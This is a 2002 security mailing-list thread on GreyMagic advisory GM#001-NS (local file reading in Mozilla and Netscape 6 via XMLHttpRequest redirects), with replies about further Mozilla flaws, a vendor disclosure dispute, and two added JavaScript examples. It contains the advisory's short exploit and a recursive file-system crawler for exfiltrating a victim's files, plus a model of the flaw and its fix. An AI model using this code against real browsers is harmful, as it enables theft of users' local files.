UPDATE (1-May-2002): Reading local files in Netscape 6 and Mozilla (GM#001-NS)

2002-05-04 Thread GreyMagic Software

Hello,

A bit after we released the advisory we received two emails, which notified
us that through testing in our demonstration, they found out that this bug
can also be used to list files in folders.

That alone makes this bug far more volatile than the one patched by
MS02-008. It is possible to recursively build a tree of the victim's file
system, along with size, date and the content of files.

This vulnerability opens the entire file system up for reading (as long as
the browser user has access).

We added a "Mozilla Disk Explorer" demonstration to our advisory, which lets
you browse through your local disk, entering folders and reading files with
a simple click. Everything you see in this demonstration could be easily
transferred to an attacking server, logging your file system structure and
contents (without need for user interaction, of course).

You can view it at http://sec.greymagic.com/adv/gm001-ns/mozexplorer.html

Thanks to "loon" and Gerd Zemella for letting us know.

On a different note, this issue has been fixed by the Mozilla crew; thanks
for the quick patch.

- GMS
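What the update describes, turned into code as an added example that is not part of GreyMagic's "Mozilla Disk Explorer" or of this post: a recursive crawl of a file system through a read-any-URL primitive. `readViaRedirect()` is a hypothetical stand-in for the XMLHttpRequest-through-redirect read (in a live attack it would issue `oXML.open("GET", "getFile.asp?p=...")` and hand back `responseText`), the `file://` tree is constructed in memory, and the assumption that a directory fetch comes back as an HTML page with one `<a href>` per entry, folders ending in "/", is mine; the thread does not state the listing format Mozilla returned.

```javascript
// Added example: recursive enumeration of a victim's file system through a
// "read any URL" primitive such as the one in GM#001-NS. Not GreyMagic's code.
// The file:// tree below is CONSTRUCTED for the example; the directory-listing
// shape (one <a href> per entry, trailing "/" on folders) is an ASSUMPTION.

const FAKE_DISK = {
  "c:/": ["boot.ini", "winnt/", "docs/"],
  "c:/winnt/": ["win.ini", "system32/"],
  "c:/winnt/system32/": ["drivers/"],
  "c:/winnt/system32/drivers/": ["etc/"],
  "c:/winnt/system32/drivers/etc/": ["hosts"],
  "c:/docs/": ["secret.txt"],
  "c:/boot.ini": "[boot loader]\r\ntimeout=30\r\n",
  "c:/winnt/win.ini": "[fonts]\r\n",
  "c:/winnt/system32/drivers/etc/hosts": "127.0.0.1 localhost\r\n",
  "c:/docs/secret.txt": "payroll 2002",
};

// Render a folder as the kind of index page a browser serves for a file:// dir.
function renderListing(path, entries) {
  return "<html><body><h1>Index of " + path + "</h1>" +
    entries.map(e => '<a href="' + e + '">' + e + "</a>").join("<br>") +
    "</body></html>";
}

// Hypothetical stand-in for: oXML.open("GET", "getFile.asp?p=" + path, false);
// oXML.send(null); return oXML.responseText;  In the real attack the server
// script redirects to file://<path> and the browser returns the bytes.
function readViaRedirect(path) {
  const node = FAKE_DISK[path];
  if (node === undefined) throw new Error("not found: " + path);
  return Array.isArray(node) ? renderListing(path, node) : node;
}

// Pull hrefs out of a listing page. Folders end with "/", files do not.
function parseListing(html) {
  const out = [];
  const re = /<a\s+href="([^"]+)"/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out;
}

// Recursively build {path, type, children | size+body} from a start folder.
// maxDepth guards against runaway recursion (junction loops, huge trees).
function crawl(path, read, depth = 0, maxDepth = 16) {
  const tree = { path, type: "dir", children: [] };
  if (depth >= maxDepth) return tree;
  for (const entry of parseListing(read(path))) {
    if (entry.endsWith("/")) {
      tree.children.push(crawl(path + entry, read, depth + 1, maxDepth));
    } else {
      const body = read(path + entry);
      tree.children.push({ path: path + entry, type: "file", size: body.length, body });
    }
  }
  return tree;
}

// Flatten the tree to "path size" lines: the inventory an attacking server
// would receive (e.g. as a POST body) without any user interaction.
function flatten(tree, out = []) {
  if (tree.type === "file") out.push(tree.path + " " + tree.size);
  else for (const c of tree.children) flatten(c, out);
  return out;
}

const tree = crawl("c:/", readViaRedirect);
console.log(flatten(tree).join("\n"));
```

Run under Node. With the real primitive the only thing that changes is the body of `readViaRedirect()`; the depth limit matters because a synchronous XMLHttpRequest blocks the page while the crawl runs, and a loop through a junction would otherwise never finish.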




RE: Reading local files in Netscape 6 and Mozilla (GM#001-NS)

2002-04-30 Thread Rui Miguel Silva Seabra

Funny,

so much rant about not receiving any contact from Netscape (AOL
subsidiary) or about not even giving prior notification to the
developers about the bug AND, all in all, no one even posts to a 
bugzilla entry on bugzilla.mozilla.org which is the best place for bug
reports on Mozilla (ie, *not marketdroid webpages*).

This is either ignorance of bugzilla (bad but I can understand that), or
intention to defame the mozilla developers, which is very bad, since a
lot of them dedicate their free time to providing us with an extremely
standards compliant, Free Software, cross platform web browser, and so
we actually owe them a favour (so to speak).

If it is ignorance, I will, then, try to educate:
  1. load your favorite browser, and go to http://bugzilla.mozilla.org
  2. submit bug
  3. if very urgent, go to irc.mozilla.org, /join #mozillazine and
SCREAM SECURITY BUG, can anyone urgently look at *URL*FOR*BUG*ID,
please? I can help with details.

In any other case than having first tried to do that, this rant seems
absolutely unnecessary.

Regards

-- 
+ No matter how much you do, you never do enough -- unknown
+ Whatever you do will be insignificant,
| but it is very important that you do it -- Gandhi
+ So let's do it...?





RE: Reading local files in Netscape 6 and Mozilla (GM#001-NS)

2002-04-30 Thread Thor Larholm

> Demonstration:
> ==============
> 
> A fully dynamic proof-of-concept demonstration
> of this issue is available at
> http://security.greymagic.com/adv/gm001-ns/.

As some of you may have noticed, the above proof-of-concept does not work in
Mozilla 1.0 Release Candidate 1.

Don't get your hopes high about this though, the issue has not been fixed in
moz1rc1 - the XMLHttpRequest was simply broken in this version of the
browser for unknown reasons, a fact not mentioned in the release notes. When
trying to use it, either nothing happens or the browser crashes. The
proof-of-concept works just fine in Mozilla 0.9.9 (and NS6.1+), and would
work fine in moz1rc1 if the XMLHttpRequest object could be used at all.

The Mozilla XML-Extras project also includes a document.load method that is
used to load XML documents. The same issue applies to this method, and a
proof-of-concept demonstration that also works in moz1rc1 can be found at

http://jscript.dk/2002/4/NS6Tests/documentload.html

Regards
Thor Larholm
Jubii A/S - Internet Programmer



RE: Reading local files in Netscape 6 and Mozilla (GM#001-NS)

2002-04-30 Thread Thor Larholm

Disturbing.

Netscape sure must be in financial problems since they are selling out on
their users' security for a lousy $1000.

I know for one that I personally will release any future Netscape advisories
with full public disclosure and without prior Netscape notification. As a
matter of fact, why not start now ?

The IRC:// protocol inhibited by Mozilla/NS6 seems to have a buffer overrun.
A typical IRC URL could look like this:

IRC://IRC.YOUR.TLD/#YOURCHANNEL

The #YOURCHANNEL part is copied to a buffer that has a limit of 32K. 
If the input exceeds this limit, Mozilla 1.0 RC1 crashes with the following
error: 

The exception unknown software exception (0xc0fd) occurred in the
application at location 0x60e42edf 

Mozilla 0.9.9 gives a similar exception: 

The exception unknown software exception (0xc0fd) occurred in the
application at location 0x60dd2c79.

Other versions of Mozilla/NS6/Galeon likely share the same flaw.
I haven't tested further on how practically exploitable this is.
Short example online at

http://jscript.dk/2002/4/moz1rc1tests/ircbufferoverrun.html

Furthermore, Mozilla/Galeon/NS6 is prone to a local file detection
vulnerability.

When embedding a stylesheet with the <link> element, access to CSS files
from other protocols is prohibited by the security manager. A simple HTTP
redirect circumvents this security restriction and it becomes possible to
use local or remote files of any type, with the side effect that you can
detect if specific local files exist.

http://jscript.dk/2002/4/NS6Tests/LinkLocalFileDetect.asp


Regards
Thor Larholm
Jubii A/S - Internet Programmer




Reading local files in Netscape 6 and Mozilla (GM#001-NS)

2002-04-30 Thread GreyMagic Software

GreyMagic Security Advisory GM#001-NS
=====================================

By GreyMagic Software, Israel.
30 Apr 2002.

Available in HTML format at http://security.greymagic.com/adv/gm001-ns/.

Topic: Reading local files in Netscape 6 and Mozilla.

Discovery date: 30 Mar 2002.

Affected applications:
======================

* All tested versions of Mozilla (0.9.7+) on Windows, other
versions/platforms are believed to be vulnerable.

* All tested versions of Netscape (6.1+) on Windows, other
versions/platforms are believed to be vulnerable.


Important notes:
================

Netscape was contacted on 24 Apr 2002 through a form on their web site and
through email to [EMAIL PROTECTED] and [EMAIL PROTECTED]

They did not bother to respond AT ALL, and we think we know why.

A while ago Netscape started a "Bug Bounty" program, which entitles
researchers who find a bug that allows an attacker to run unsafe code or
access files to a $1000 reward.

By completely disregarding our post Netscape has earned themselves a $1000
and lost any credibility they might have had. The money is irrelevant, but
using such a con to attract researchers into disclosing bugs to Netscape is
extremely unprofessional.

Netscape's faulty conduct made us rethink our disclosure guidelines and we
came to the following decisions:

* Release all future Netscape advisories without notifying Netscape at all.

* Advise the security community to do the same. Netscape is deceiving
researchers and should not be rewarded.

* Advise customers to stop using Netscape Navigator through our security
advisories and business contacts.


[1] http://home.netscape.com/security/bugbounty.html


Introduction:
=============

XMLHTTP is a component that is primarily used for retrieving XML documents
from a web server.

On 15 Dec 2001 "Jelmer" published an advisory titled "MSIE6 can read local
files", which demonstrated how Microsoft's XMLHTTP component allows reading
of local files by blindly following server-side redirections (patched by
MS02-008).

[2] http://www.xs4all.nl/~jkuperus/bug.htm
[3] http://www.microsoft.com/technet/security/bulletin/MS02-008.asp

Discussion:
===========

Mozilla's version of XMLHTTP, the XMLHttpRequest object, is vulnerable to
the exact same attack.

By directing the "open" method to a web page that will redirect to a
local/remote file it is possible to fool Mozilla into thinking it's still in
the allowed zone, therefore allowing us to read it.

It is then possible to inspect the content by using the responseText
property.


Exploit:
========

This example attempts to read "c:/test.txt"; "getFile.asp" internally
redirects to "file://c:/test.txt":

var oXML=new XMLHttpRequest();
// getFile.asp lives on the attacker's own server, so the check done by
// open() passes; it answers with a redirect to file://c:/test.txt, which
// the browser follows without checking again.
oXML.open("GET","getFile.asp",false);
oXML.send(null);
// The local file's contents come back as if they were the response.
alert(oXML.responseText);


Solution:
=========

Users of Netscape Navigator should move to a better performing, less buggy
browser.


Tested on:
==========

Mozilla 0.9.7, NT4.
Mozilla 0.9.9, NT4.
Mozilla 0.9.9, Win2000.
Netscape 6.1, NT4.
Netscape 6.2.1, Win2000.
Netscape 6.2.2, NT4.
Netscape 6.2.2, Win2000.


Demonstration:
==============

A fully dynamic proof-of-concept demonstration of this issue is available at
http://security.greymagic.com/adv/gm001-ns/.


Feedback:
=========

Please mail any questions or comments to [EMAIL PROTECTED]

- Copyright © 2002 GreyMagic Software.
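As an added example (neither Mozilla's security-manager code nor GreyMagic's or Thor Larholm's demonstrations), the following models the root cause shared by the XMLHttpRequest, document.load and <link> stylesheet findings in this thread: the URL handed to the loader is checked once, and a server-side redirect to file: afterwards is followed without a second check. The redirect table standing in for the attacker's server (getFile.asp answering with a redirect to file:///c:/test.txt), the origins, and `checkLoadURI()` itself are assumptions made for the example. It runs under Node, whose global `URL` class does the parsing.

```javascript
// Added example, not Mozilla's or GreyMagic's code: the "check once, then
// follow redirects blindly" mistake behind GM#001-NS beside the hardened form
// that re-checks every hop. The redirect table is CONSTRUCTED and stands in
// for the attacker's server; checkLoadURI() is a simplification of a browser
// security manager, not the real implementation.

const PAGE_ORIGIN = "http://attacker.example";

// Each key answers with a redirect (Location:) to its value; anything else
// is a plain 200.
const REDIRECTS = new Map([
  ["http://attacker.example/getFile.asp", "file:///c:/test.txt"],
  ["http://attacker.example/hop1", "http://attacker.example/hop2"],
  ["http://attacker.example/hop2", "http://attacker.example/getFile.asp"],
  ["http://attacker.example/theme.css", "http://cdn.example/theme.css"],
  ["http://attacker.example/probe.css", "file:///c:/winnt/win.ini"],
]);

// Policy for one URL. XMLHttpRequest / document.load were same-origin loads;
// a <link rel=stylesheet> may come from any http(s) origin. Neither may ever
// end up on file: (or any other non-web scheme) when started by a web page.
function checkLoadURI(pageOrigin, target, sameOriginOnly) {
  const u = new URL(target);
  if (u.protocol !== "http:" && u.protocol !== "https:") {
    return { ok: false, reason: "scheme " + u.protocol + " is not loadable from a web page" };
  }
  if (sameOriginOnly && u.origin !== pageOrigin) {
    return { ok: false, reason: u.origin + " is not " + pageOrigin };
  }
  return { ok: true, reason: "" };
}

// Follow redirects and report where the load ends up. policy "once" runs the
// check only on the URL passed to open() (the behaviour the advisory exploits);
// "every-hop" re-runs it on each Location: target before following it.
function resolve(start, policy, sameOriginOnly, pageOrigin = PAGE_ORIGIN, maxHops = 10) {
  let current = start;
  const first = checkLoadURI(pageOrigin, current, sameOriginOnly);
  if (!first.ok) return { allowed: false, url: current, hops: 0, reason: first.reason };
  for (let hop = 1; hop <= maxHops; hop++) {
    const next = REDIRECTS.get(current);
    if (next === undefined) return { allowed: true, url: current, hops: hop - 1, reason: "" };
    current = next;
    if (policy === "every-hop") {
      const c = checkLoadURI(pageOrigin, current, sameOriginOnly);
      if (!c.ok) return { allowed: false, url: current, hops: hop, reason: c.reason };
    }
  }
  return { allowed: false, url: current, hops: maxHops, reason: "too many redirects" };
}

// Stand-in for oXML.open("GET", url, false); oXML.send(null); oXML.responseText
// (and for document.load(url), which used the same loader).
function xhrGet(url, policy) {
  return resolve(url, policy, true);
}

// Stand-in for <link rel="stylesheet" href=url>. Whether the load succeeds or
// errors is observable from script, which is what the local-file probe uses.
function linkStylesheet(url, policy) {
  return resolve(url, policy, false);
}

for (const policy of ["once", "every-hop"]) {
  console.log(policy, "XHR getFile.asp ->", xhrGet(PAGE_ORIGIN + "/getFile.asp", policy));
  console.log(policy, "XHR hop1        ->", xhrGet(PAGE_ORIGIN + "/hop1", policy));
  console.log(policy, "link theme.css  ->", linkStylesheet(PAGE_ORIGIN + "/theme.css", policy));
  console.log(policy, "link probe.css  ->", linkStylesheet(PAGE_ORIGIN + "/probe.css", policy));
}
```

The `once` rows reproduce what the advisory describes: the XHR ends on file:///c:/test.txt and the page reads it as `responseText`, even through a chain of same-origin hops. The `every-hop` rows are the fixed behaviour, and the theme.css case shows the fix does not break the legitimate http-to-http redirects stylesheets routinely use; under `once`, probe.css ends on a file: URL, and whether that stylesheet then loads or errors is the signal the local-file-existence probe observes.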